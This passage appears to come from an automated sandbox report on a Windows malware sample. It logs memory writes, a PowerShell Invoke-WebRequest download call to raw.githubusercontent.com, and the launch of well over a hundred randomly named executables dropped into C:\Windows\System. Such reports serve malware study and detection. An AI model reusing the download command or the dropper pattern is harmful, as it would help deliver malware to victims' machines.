PID 2940 wrote to memory of 3792	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	95
PID 2940 wrote to memory of 2596	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	96
PID 2940 wrote to memory of 2596	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	96
PID 2940 wrote to memory of 684	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	97
PID 2940 wrote to memory of 684	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	97
PID 2940 wrote to memory of 4436	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	98
PID 2940 wrote to memory of 4436	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	98
PID 2940 wrote to memory of 3788	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	99
PID 2940 wrote to memory of 3788	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	99
PID 2940 wrote to memory of 4904	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	100
PID 2940 wrote to memory of 4904	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	100
PID 2940 wrote to memory of 3624	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	101
PID 2940 wrote to memory of 3624	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	101
PID 2940 wrote to memory of 1780	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	102
PID 2940 wrote to memory of 1780	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	102
PID 2940 wrote to memory of 3888	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	103
PID 2940 wrote to memory of 3888	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	103
PID 2940 wrote to memory of 4972	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	104
PID 2940 wrote to memory of 4972	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	104
PID 2940 wrote to memory of 4444	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	105
PID 2940 wrote to memory of 4444	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	105
PID 2940 wrote to memory of 2964	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	106
PID 2940 wrote to memory of 2964	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	106
PID 2940 wrote to memory of 2784	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	107
PID 2940 wrote to memory of 2784	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	107
PID 2940 wrote to memory of 2548	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	108
PID 2940 wrote to memory of 2548	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	108
PID 2940 wrote to memory of 4876	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	109
PID 2940 wrote to memory of 4876	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	109
PID 2940 wrote to memory of 2592	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	110
PID 2940 wrote to memory of 2592	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	110
PID 2940 wrote to memory of 3232	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	111
PID 2940 wrote to memory of 3232	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	111
PID 2940 wrote to memory of 3208	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	112
PID 2940 wrote to memory of 3208	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	112
PID 2940 wrote to memory of 1644	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	113
PID 2940 wrote to memory of 1644	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	113
PID 2940 wrote to memory of 1068	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	114
PID 2940 wrote to memory of 1068	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	114
PID 2940 wrote to memory of 4364	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	115
PID 2940 wrote to memory of 4364	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	115
PID 2940 wrote to memory of 4692	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	116
PID 2940 wrote to memory of 4692	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	116
PID 2940 wrote to memory of 3784	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	117
PID 2940 wrote to memory of 3784	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	117
PID 2940 wrote to memory of 620	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	118
PID 2940 wrote to memory of 620	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	118
PID 2940 wrote to memory of 3284	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	119
PID 2940 wrote to memory of 3284	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	119
PID 2940 wrote to memory of 4992	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	120
PID 2940 wrote to memory of 4992	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	120
PID 2940 wrote to memory of 2668	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	121
PID 2940 wrote to memory of 2668	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	121

C:\Users\Admin\AppData\Local\Temp\793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
"C:\Users\Admin\AppData\Local\Temp\793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4928
- C:\Windows\System\BYSvCrv.exe
  C:\Windows\System\BYSvCrv.exe
  2⤵
  - Executes dropped EXE
  PID:1152
- C:\Windows\System\WIcbOIM.exe
  C:\Windows\System\WIcbOIM.exe
  2⤵
  - Executes dropped EXE
  PID:1364
- C:\Windows\System\xCgiJvS.exe
  C:\Windows\System\xCgiJvS.exe
  2⤵
  - Executes dropped EXE
  PID:3956
- C:\Windows\System\IuQqZwg.exe
  C:\Windows\System\IuQqZwg.exe
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Windows\System\KlafKPK.exe
  C:\Windows\System\KlafKPK.exe
  2⤵
  - Executes dropped EXE
  PID:3792
- C:\Windows\System\hZGmCZV.exe
  C:\Windows\System\hZGmCZV.exe
  2⤵
  - Executes dropped EXE
  PID:2596
- C:\Windows\System\WSABEQt.exe
  C:\Windows\System\WSABEQt.exe
  2⤵
  - Executes dropped EXE
  PID:684
- C:\Windows\System\wiXQZVR.exe
  C:\Windows\System\wiXQZVR.exe
  2⤵
  - Executes dropped EXE
  PID:4436
- C:\Windows\System\JRhHLhc.exe
  C:\Windows\System\JRhHLhc.exe
  2⤵
  - Executes dropped EXE
  PID:3788
- C:\Windows\System\UirFkav.exe
  C:\Windows\System\UirFkav.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Windows\System\gBjAMSI.exe
  C:\Windows\System\gBjAMSI.exe
  2⤵
  - Executes dropped EXE
  PID:3624
- C:\Windows\System\fqkzjqJ.exe
  C:\Windows\System\fqkzjqJ.exe
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Windows\System\YwSxbcs.exe
  C:\Windows\System\YwSxbcs.exe
  2⤵
  - Executes dropped EXE
  PID:3888
- C:\Windows\System\oqstFyr.exe
  C:\Windows\System\oqstFyr.exe
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Windows\System\JmrQcow.exe
  C:\Windows\System\JmrQcow.exe
  2⤵
  - Executes dropped EXE
  PID:4444
- C:\Windows\System\utspRFP.exe
  C:\Windows\System\utspRFP.exe
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\System\MmQHTjh.exe
  C:\Windows\System\MmQHTjh.exe
  2⤵
  - Executes dropped EXE
  PID:2784
- C:\Windows\System\SjaGryN.exe
  C:\Windows\System\SjaGryN.exe
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\Windows\System\gHMctdz.exe
  C:\Windows\System\gHMctdz.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Windows\System\vYCSDQF.exe
  C:\Windows\System\vYCSDQF.exe
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Windows\System\xWRpzMF.exe
  C:\Windows\System\xWRpzMF.exe
  2⤵
  - Executes dropped EXE
  PID:3232
- C:\Windows\System\cIUQHlS.exe
  C:\Windows\System\cIUQHlS.exe
  2⤵
  - Executes dropped EXE
  PID:3208
- C:\Windows\System\WLauuQk.exe
  C:\Windows\System\WLauuQk.exe
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Windows\System\WYndaRn.exe
  C:\Windows\System\WYndaRn.exe
  2⤵
  - Executes dropped EXE
  PID:1068
- C:\Windows\System\AwbFKAC.exe
  C:\Windows\System\AwbFKAC.exe
  2⤵
  - Executes dropped EXE
  PID:4364
- C:\Windows\System\JhlHpJF.exe
  C:\Windows\System\JhlHpJF.exe
  2⤵
  - Executes dropped EXE
  PID:4692
- C:\Windows\System\LzIbubZ.exe
  C:\Windows\System\LzIbubZ.exe
  2⤵
  - Executes dropped EXE
  PID:3784
- C:\Windows\System\gkSVebj.exe
  C:\Windows\System\gkSVebj.exe
  2⤵
  - Executes dropped EXE
  PID:620
- C:\Windows\System\xxWWioL.exe
  C:\Windows\System\xxWWioL.exe
  2⤵
  - Executes dropped EXE
  PID:3284
- C:\Windows\System\yPYZjlq.exe
  C:\Windows\System\yPYZjlq.exe
  2⤵
  - Executes dropped EXE
  PID:4992
- C:\Windows\System\IXvlqss.exe
  C:\Windows\System\IXvlqss.exe
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Windows\System\CZpmYNo.exe
  C:\Windows\System\CZpmYNo.exe
  2⤵
  - Executes dropped EXE
  PID:3444
- C:\Windows\System\QEojhEC.exe
  C:\Windows\System\QEojhEC.exe
  2⤵
  - Executes dropped EXE
  PID:4220
- C:\Windows\System\vmrWDRV.exe
  C:\Windows\System\vmrWDRV.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Windows\System\aADSxfK.exe
  C:\Windows\System\aADSxfK.exe
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Windows\System\xlmNVYQ.exe
  C:\Windows\System\xlmNVYQ.exe
  2⤵
  - Executes dropped EXE
  PID:1420
- C:\Windows\System\sNtsjPg.exe
  C:\Windows\System\sNtsjPg.exe
  2⤵
  - Executes dropped EXE
  PID:2712
- C:\Windows\System\SlLOASi.exe
  C:\Windows\System\SlLOASi.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\baPVekO.exe
  C:\Windows\System\baPVekO.exe
  2⤵
  - Executes dropped EXE
  PID:8
- C:\Windows\System\folxoad.exe
  C:\Windows\System\folxoad.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\lughWxT.exe
  C:\Windows\System\lughWxT.exe
  2⤵
  - Executes dropped EXE
  PID:4708
- C:\Windows\System\lcXUORy.exe
  C:\Windows\System\lcXUORy.exe
  2⤵
  - Executes dropped EXE
  PID:3740
- C:\Windows\System\YHbNfza.exe
  C:\Windows\System\YHbNfza.exe
  2⤵
  - Executes dropped EXE
  PID:4840
- C:\Windows\System\kRXTShu.exe
  C:\Windows\System\kRXTShu.exe
  2⤵
  - Executes dropped EXE
  PID:1132
- C:\Windows\System\XEssNqu.exe
  C:\Windows\System\XEssNqu.exe
  2⤵
  - Executes dropped EXE
  PID:4116
- C:\Windows\System\mUdQGcz.exe
  C:\Windows\System\mUdQGcz.exe
  2⤵
  - Executes dropped EXE
  PID:3068
- C:\Windows\System\qIcNJmb.exe
  C:\Windows\System\qIcNJmb.exe
  2⤵
  - Executes dropped EXE
  PID:3292
- C:\Windows\System\lUzEFJq.exe
  C:\Windows\System\lUzEFJq.exe
  2⤵
  - Executes dropped EXE
  PID:2476
- C:\Windows\System\McUzQRw.exe
  C:\Windows\System\McUzQRw.exe
  2⤵
  - Executes dropped EXE
  PID:3348
- C:\Windows\System\CayZTVu.exe
  C:\Windows\System\CayZTVu.exe
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Windows\System\IXMkCvX.exe
  C:\Windows\System\IXMkCvX.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\ChijmuS.exe
  C:\Windows\System\ChijmuS.exe
  2⤵
  - Executes dropped EXE
  PID:4460
- C:\Windows\System\gNxeLPh.exe
  C:\Windows\System\gNxeLPh.exe
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Windows\System\yRuIfDP.exe
  C:\Windows\System\yRuIfDP.exe
  2⤵
  - Executes dropped EXE
  PID:3312
- C:\Windows\System\YzzSjYG.exe
  C:\Windows\System\YzzSjYG.exe
  2⤵
  - Executes dropped EXE
  PID:4792
- C:\Windows\System\okBcBIe.exe
  C:\Windows\System\okBcBIe.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\gOOkhfU.exe
  C:\Windows\System\gOOkhfU.exe
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Windows\System\bcoaQiS.exe
  C:\Windows\System\bcoaQiS.exe
  2⤵
  - Executes dropped EXE
  PID:3040
- C:\Windows\System\JHvsrLR.exe
  C:\Windows\System\JHvsrLR.exe
  2⤵
  - Executes dropped EXE
  PID:4908
- C:\Windows\System\QoAGxIu.exe
  C:\Windows\System\QoAGxIu.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\muyzQkZ.exe
  C:\Windows\System\muyzQkZ.exe
  2⤵
  - Executes dropped EXE
  PID:1440
- C:\Windows\System\yIeAeOn.exe
  C:\Windows\System\yIeAeOn.exe
  2⤵
  - Executes dropped EXE
  PID:384
- C:\Windows\System\VJhrJXD.exe
  C:\Windows\System\VJhrJXD.exe
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\Windows\System\OGkOWQe.exe
  C:\Windows\System\OGkOWQe.exe
  2⤵
  - Executes dropped EXE
  PID:4168
- C:\Windows\System\qECJBwz.exe
  C:\Windows\System\qECJBwz.exe
  2⤵
  PID:3384
- C:\Windows\System\yUZJQnX.exe
  C:\Windows\System\yUZJQnX.exe
  2⤵
  PID:1672
- C:\Windows\System\ZyEpRCS.exe
  C:\Windows\System\ZyEpRCS.exe
  2⤵
  PID:2168
- C:\Windows\System\lbnPaEK.exe
  C:\Windows\System\lbnPaEK.exe
  2⤵
  PID:4040
- C:\Windows\System\SXKeeBM.exe
  C:\Windows\System\SXKeeBM.exe
  2⤵
  PID:4456
- C:\Windows\System\LQHLrJF.exe
  C:\Windows\System\LQHLrJF.exe
  2⤵
  PID:4432
- C:\Windows\System\vIAXJXM.exe
  C:\Windows\System\vIAXJXM.exe
  2⤵
  PID:1832
- C:\Windows\System\pTKaFJL.exe
  C:\Windows\System\pTKaFJL.exe
  2⤵
  PID:2284
- C:\Windows\System\pCzrsyk.exe
  C:\Windows\System\pCzrsyk.exe
  2⤵
  PID:2404
- C:\Windows\System\sPtPBWm.exe
  C:\Windows\System\sPtPBWm.exe
  2⤵
  PID:636
- C:\Windows\System\FrPFGvw.exe
  C:\Windows\System\FrPFGvw.exe
  2⤵
  PID:3352
- C:\Windows\System\zuUYxYw.exe
  C:\Windows\System\zuUYxYw.exe
  2⤵
  PID:5144
- C:\Windows\System\oQRhAEB.exe
  C:\Windows\System\oQRhAEB.exe
  2⤵
  PID:5168
- C:\Windows\System\FZKPOKX.exe
  C:\Windows\System\FZKPOKX.exe
  2⤵
  PID:5188
- C:\Windows\System\nGjGMmK.exe
  C:\Windows\System\nGjGMmK.exe
  2⤵
  PID:5212
- C:\Windows\System\mbJDVGT.exe
  C:\Windows\System\mbJDVGT.exe
  2⤵
  PID:5228
- C:\Windows\System\hGxIxUv.exe
  C:\Windows\System\hGxIxUv.exe
  2⤵
  PID:5248
- C:\Windows\System\UiWEaOB.exe
  C:\Windows\System\UiWEaOB.exe
  2⤵
  PID:5268
- C:\Windows\System\tFRlkaq.exe
  C:\Windows\System\tFRlkaq.exe
  2⤵
  PID:5284
- C:\Windows\System\KMPMoin.exe
  C:\Windows\System\KMPMoin.exe
  2⤵
  PID:5304
- C:\Windows\System\qgfGfSD.exe
  C:\Windows\System\qgfGfSD.exe
  2⤵
  PID:5320
- C:\Windows\System\CbJcumt.exe
  C:\Windows\System\CbJcumt.exe
  2⤵
  PID:5340
- C:\Windows\System\vSAtalj.exe
  C:\Windows\System\vSAtalj.exe
  2⤵
  PID:5364
- C:\Windows\System\aSMfECO.exe
  C:\Windows\System\aSMfECO.exe
  2⤵
  PID:5384
- C:\Windows\System\eiPdajm.exe
  C:\Windows\System\eiPdajm.exe
  2⤵
  PID:5400
- C:\Windows\System\FeHWbPL.exe
  C:\Windows\System\FeHWbPL.exe
  2⤵
  PID:5436
- C:\Windows\System\kTUdWHD.exe
  C:\Windows\System\kTUdWHD.exe
  2⤵
  PID:5452
- C:\Windows\System\FIbmLON.exe
  C:\Windows\System\FIbmLON.exe
  2⤵
  PID:5472
- C:\Windows\System\TlFVkhh.exe
  C:\Windows\System\TlFVkhh.exe
  2⤵
  PID:5492
- C:\Windows\System\AfjbXel.exe
  C:\Windows\System\AfjbXel.exe
  2⤵
  PID:5508
- C:\Windows\System\mnPHJSN.exe
  C:\Windows\System\mnPHJSN.exe
  2⤵
  PID:5528
- C:\Windows\System\jyknQyU.exe
  C:\Windows\System\jyknQyU.exe
  2⤵
  PID:5548
- C:\Windows\System\LOLNzjt.exe
  C:\Windows\System\LOLNzjt.exe
  2⤵
  PID:5568
- C:\Windows\System\SVEhpwB.exe
  C:\Windows\System\SVEhpwB.exe
  2⤵
  PID:5584
- C:\Windows\System\ejqyNtb.exe
  C:\Windows\System\ejqyNtb.exe
  2⤵
  PID:5600
- C:\Windows\System\VIvPByG.exe
  C:\Windows\System\VIvPByG.exe
  2⤵
  PID:5620
- C:\Windows\System\lAXiZXo.exe
  C:\Windows\System\lAXiZXo.exe
  2⤵
  PID:5636
- C:\Windows\System\yqrzbkN.exe
  C:\Windows\System\yqrzbkN.exe
  2⤵
  PID:5656
- C:\Windows\System\wMPuYsv.exe
  C:\Windows\System\wMPuYsv.exe
  2⤵
  PID:5676
- C:\Windows\System\DUDlFKD.exe
  C:\Windows\System\DUDlFKD.exe
  2⤵
  PID:5692
- C:\Windows\System\WSGUEwh.exe
  C:\Windows\System\WSGUEwh.exe
  2⤵
  PID:5716
- C:\Windows\System\yKzOwLk.exe
  C:\Windows\System\yKzOwLk.exe
  2⤵
  PID:5736
- C:\Windows\System\qaRmLyh.exe
  C:\Windows\System\qaRmLyh.exe
  2⤵
  PID:5756
- C:\Windows\System\xpQqUom.exe
  C:\Windows\System\xpQqUom.exe
  2⤵
  PID:5780
- C:\Windows\System\OLYdqOT.exe
  C:\Windows\System\OLYdqOT.exe
  2⤵
  PID:5800
- C:\Windows\System\bbkJQxp.exe
  C:\Windows\System\bbkJQxp.exe
  2⤵
  PID:5820
- C:\Windows\System\WSzAIXd.exe
  C:\Windows\System\WSzAIXd.exe
  2⤵
  PID:5840
- C:\Windows\System\qbmWTIY.exe
  C:\Windows\System\qbmWTIY.exe
  2⤵
  PID:5856
- C:\Windows\System\PyjQxUG.exe
  C:\Windows\System\PyjQxUG.exe
  2⤵
  PID:5872
- C:\Windows\System\XYdoyoj.exe
  C:\Windows\System\XYdoyoj.exe
  2⤵
  PID:5900
- C:\Windows\System\NlNKZAv.exe
  C:\Windows\System\NlNKZAv.exe
  2⤵
  PID:5916
- C:\Windows\System\gHClqzM.exe
  C:\Windows\System\gHClqzM.exe
  2⤵
  PID:5936
- C:\Windows\System\TMsqJbm.exe
  C:\Windows\System\TMsqJbm.exe
  2⤵
  PID:5956
- C:\Windows\System\GyCBVKO.exe
  C:\Windows\System\GyCBVKO.exe
  2⤵
  PID:5972
- C:\Windows\System\yVBDEma.exe
  C:\Windows\System\yVBDEma.exe
  2⤵
  PID:5992
- C:\Windows\System\GlGgGtC.exe
  C:\Windows\System\GlGgGtC.exe
  2⤵
  PID:6012
- C:\Windows\System\CDODGmR.exe
  C:\Windows\System\CDODGmR.exe
  2⤵
  PID:6032
- C:\Windows\System\UHQAZGC.exe
  C:\Windows\System\UHQAZGC.exe
  2⤵
  PID:6052
- C:\Windows\System\KvhlVkm.exe
  C:\Windows\System\KvhlVkm.exe
  2⤵
  PID:6068
- C:\Windows\System\iUudjIe.exe
  C:\Windows\System\iUudjIe.exe
  2⤵
  PID:6088
- C:\Windows\System\TGoEykj.exe
  C:\Windows\System\TGoEykj.exe
  2⤵
  PID:6108
- C:\Windows\System\oYCMrEE.exe
  C:\Windows\System\oYCMrEE.exe
  2⤵
  PID:6124
- C:\Windows\System\BnMpbxY.exe
  C:\Windows\System\BnMpbxY.exe
  2⤵
  PID:4252
- C:\Windows\System\AtFGcbR.exe
  C:\Windows\System\AtFGcbR.exe
  2⤵
  PID:2360
- C:\Windows\System\PHorjiF.exe
  C:\Windows\System\PHorjiF.exe
  2⤵
  PID:2356
- C:\Windows\System\XlBZKtT.exe
  C:\Windows\System\XlBZKtT.exe
  2⤵
  PID:4856
- C:\Windows\System\YUbippL.exe
  C:\Windows\System\YUbippL.exe
  2⤵
  PID:2484
- C:\Windows\System\XEjhdVz.exe
  C:\Windows\System\XEjhdVz.exe
  2⤵
  PID:3564
- C:\Windows\System\AolEaDH.exe
  C:\Windows\System\AolEaDH.exe
  2⤵
  PID:1588
- C:\Windows\System\ZbapxbU.exe
  C:\Windows\System\ZbapxbU.exe
  2⤵
  PID:2312
- C:\Windows\System\rdZCEwq.exe
  C:\Windows\System\rdZCEwq.exe
  2⤵
  PID:4988
- C:\Windows\System\FbbfOpi.exe
  C:\Windows\System\FbbfOpi.exe
  2⤵
  PID:5128
- C:\Windows\System\WzaYSFA.exe
  C:\Windows\System\WzaYSFA.exe
  2⤵
  PID:5152
- C:\Windows\System\LlXwBBf.exe
  C:\Windows\System\LlXwBBf.exe
  2⤵
  PID:5164
- C:\Windows\System\UYrwIMx.exe
  C:\Windows\System\UYrwIMx.exe
  2⤵
  PID:4024
- C:\Windows\System\ElORQbV.exe
  C:\Windows\System\ElORQbV.exe
  2⤵
  PID:716
- C:\Windows\System\NyUMhIq.exe
  C:\Windows\System\NyUMhIq.exe
  2⤵
  PID:5276
- C:\Windows\System\uQGuEwy.exe
  C:\Windows\System\uQGuEwy.exe
  2⤵
  PID:5300
- C:\Windows\System\SWsaDKn.exe
  C:\Windows\System\SWsaDKn.exe
  2⤵
  PID:5372
- C:\Windows\System\EvpMurv.exe
  C:\Windows\System\EvpMurv.exe
  2⤵
  PID:5488
- C:\Windows\System\OSOlJOg.exe
  C:\Windows\System\OSOlJOg.exe
  2⤵
  PID:5524
- C:\Windows\System\YUpMhFv.exe
  C:\Windows\System\YUpMhFv.exe
  2⤵
  PID:5560
- C:\Windows\System\cdYQTou.exe
  C:\Windows\System\cdYQTou.exe
  2⤵
  PID:6148
- C:\Windows\System\ObBrEpd.exe
  C:\Windows\System\ObBrEpd.exe
  2⤵
  PID:6168
- C:\Windows\System\WoEqYAC.exe
  C:\Windows\System\WoEqYAC.exe
  2⤵
  PID:6184
- C:\Windows\System\wmIJHHu.exe
  C:\Windows\System\wmIJHHu.exe
  2⤵
  PID:6208
- C:\Windows\System\dwKgdfI.exe
  C:\Windows\System\dwKgdfI.exe
  2⤵
  PID:6224
- C:\Windows\System\AehLdLu.exe
  C:\Windows\System\AehLdLu.exe
  2⤵
  PID:6244
- C:\Windows\System\bzTuYLe.exe
  C:\Windows\System\bzTuYLe.exe
  2⤵
  PID:6264
- C:\Windows\System\vuBMywh.exe
  C:\Windows\System\vuBMywh.exe
  2⤵
  PID:6280
- C:\Windows\System\fdcFyKy.exe
  C:\Windows\System\fdcFyKy.exe
  2⤵
  PID:6300
- C:\Windows\System\nJuQCqu.exe
  C:\Windows\System\nJuQCqu.exe
  2⤵
  PID:6320
- C:\Windows\System\jQuoSiM.exe
  C:\Windows\System\jQuoSiM.exe
  2⤵
  PID:6336
- C:\Windows\System\qjsylNo.exe
  C:\Windows\System\qjsylNo.exe
  2⤵
  PID:6352
- C:\Windows\System\QewWyTw.exe
  C:\Windows\System\QewWyTw.exe
  2⤵
  PID:6372
- C:\Windows\System\eBKDAft.exe
  C:\Windows\System\eBKDAft.exe
  2⤵
  PID:6388
- C:\Windows\System\eILMIMv.exe
  C:\Windows\System\eILMIMv.exe
  2⤵
  PID:6408
- C:\Windows\System\msovAyu.exe
  C:\Windows\System\msovAyu.exe
  2⤵
  PID:6424
- C:\Windows\System\YsFNBoo.exe
  C:\Windows\System\YsFNBoo.exe
  2⤵
  PID:6444
- C:\Windows\System\kHpdDeG.exe
  C:\Windows\System\kHpdDeG.exe
  2⤵
  PID:6460
- C:\Windows\System\UWHzHSx.exe
  C:\Windows\System\UWHzHSx.exe
  2⤵
  PID:6480
- C:\Windows\System\iLENpZM.exe
  C:\Windows\System\iLENpZM.exe
  2⤵
  PID:6504
- C:\Windows\System\sNxrgKC.exe
  C:\Windows\System\sNxrgKC.exe
  2⤵
  PID:6520
- C:\Windows\System\CnofRyj.exe
  C:\Windows\System\CnofRyj.exe
  2⤵
  PID:6536
- C:\Windows\System\OjeDbLu.exe
  C:\Windows\System\OjeDbLu.exe
  2⤵
  PID:6556
- C:\Windows\System\asKKTZH.exe
  C:\Windows\System\asKKTZH.exe
  2⤵
  PID:6576
- C:\Windows\System\DviAnZJ.exe
  C:\Windows\System\DviAnZJ.exe
  2⤵
  PID:6592
- C:\Windows\System\uoyWxEx.exe
  C:\Windows\System\uoyWxEx.exe
  2⤵
  PID:6612
- C:\Windows\System\acWJvKC.exe
  C:\Windows\System\acWJvKC.exe
  2⤵
  PID:6632
- C:\Windows\System\wxsSPXC.exe
  C:\Windows\System\wxsSPXC.exe
  2⤵
  PID:6648
- C:\Windows\System\afScxGx.exe
  C:\Windows\System\afScxGx.exe
  2⤵
  PID:6668
- C:\Windows\System\pQMSJnc.exe
  C:\Windows\System\pQMSJnc.exe
  2⤵
  PID:6688
- C:\Windows\System\aDXiYmm.exe
  C:\Windows\System\aDXiYmm.exe
  2⤵
  PID:6708
- C:\Windows\System\iNcFGEB.exe
  C:\Windows\System\iNcFGEB.exe
  2⤵
  PID:6728
- C:\Windows\System\zIMHAJE.exe
  C:\Windows\System\zIMHAJE.exe
  2⤵
  PID:6748
- C:\Windows\System\RMKcJpO.exe
  C:\Windows\System\RMKcJpO.exe
  2⤵
  PID:6768
- C:\Windows\System\MpuCDOL.exe
  C:\Windows\System\MpuCDOL.exe
  2⤵
  PID:6784
- C:\Windows\System\XDQWRyr.exe
  C:\Windows\System\XDQWRyr.exe
  2⤵
  PID:6804
- C:\Windows\System\PjEkspV.exe
  C:\Windows\System\PjEkspV.exe
  2⤵
  PID:6824
- C:\Windows\System\TnGSkSP.exe
  C:\Windows\System\TnGSkSP.exe
  2⤵
  PID:6844
- C:\Windows\System\LkTORvK.exe
  C:\Windows\System\LkTORvK.exe
  2⤵
  PID:6860
- C:\Windows\System\LzWdONo.exe
  C:\Windows\System\LzWdONo.exe
  2⤵
  PID:7036
- C:\Windows\System\uCJUXRo.exe
  C:\Windows\System\uCJUXRo.exe
  2⤵
  PID:7052
- C:\Windows\System\cFttjRd.exe
  C:\Windows\System\cFttjRd.exe
  2⤵
  PID:7068
- C:\Windows\System\yfVcoRv.exe
  C:\Windows\System\yfVcoRv.exe
  2⤵
  PID:7088
- C:\Windows\System\yjwuDgx.exe
  C:\Windows\System\yjwuDgx.exe
  2⤵
  PID:7104
- C:\Windows\System\iVYECAz.exe
  C:\Windows\System\iVYECAz.exe
  2⤵
  PID:7120
- C:\Windows\System\JpIxLiF.exe
  C:\Windows\System\JpIxLiF.exe
  2⤵
  PID:7136
- C:\Windows\System\ILmKylz.exe
  C:\Windows\System\ILmKylz.exe
  2⤵
  PID:7152
- C:\Windows\System\nLhoBnV.exe
  C:\Windows\System\nLhoBnV.exe
  2⤵
  PID:5684
- C:\Windows\System\Nrhidbe.exe
  C:\Windows\System\Nrhidbe.exe
  2⤵
  PID:5744
